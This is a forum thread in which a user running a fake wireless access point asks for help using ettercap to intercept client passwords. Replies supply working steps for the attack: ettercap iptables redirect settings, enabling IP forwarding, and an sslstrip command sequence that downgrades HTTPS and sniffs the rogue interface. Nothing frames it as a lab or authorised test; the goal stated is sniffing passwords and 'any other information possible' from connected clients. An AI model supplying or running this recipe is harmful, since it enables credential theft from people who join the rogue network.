Printable View
i have a fake access point set up forwarding traffic through me and to the internet.
everythings works fine clients connect and get routed via my laptop running backtrack.
however when i use ettercap to perfom an mitm attacked to capture passwords, the client are no longer able to access the internet via me.
this will stay like this untill i set the forward ip tables again
i dont understand?
I am not sure if you are using ettercap properly. Have you tested the same scenario on a local wired subnet? Does it work in the wired scenario?
In experience, I find using ettercap and other MITM based attacks to be a bit kludgy on wireless. I end up DOSing victims often or dramatically decreasing their connectivity performance.
hi thanks for your reply,
i have tested this on a wired network and it works fine, do you know of anyways i could get round this?
my scenario is i have a COMPUTER connected to FAKAP connected to ME connected to the INTERNET
so all the traffic is coming through me going to the internet. i want to be able to sniff passwords and any other information possible i have tried dsniff but couldn't get that to work. i am also a bit confused on what interface to sniff. i have interface eth0 connected to the COMPUTER and interface wlan0 connected to the INTERNET. i am assuming i would sniff the wlan0 interface because thats the traffic on the INTERNET
any advice would be really appriciated thanks
Make sure the iptables section in /etc/etter.conf is uncommented.
Also doesnt hurt to run this to after ettercap is running:Code:# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Code:echo 1 > /proc/sys/net/ipv4/ip_forward
and running sslstrip might be a good idea too, that proggy rocks
get the info here Moxie Marlinspike >> software >> sslstrip
Code:# echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
python sslstrip.py -a
ettercap -T -q -i at0
anyone know how to cut down the lag that poisoned hosts get?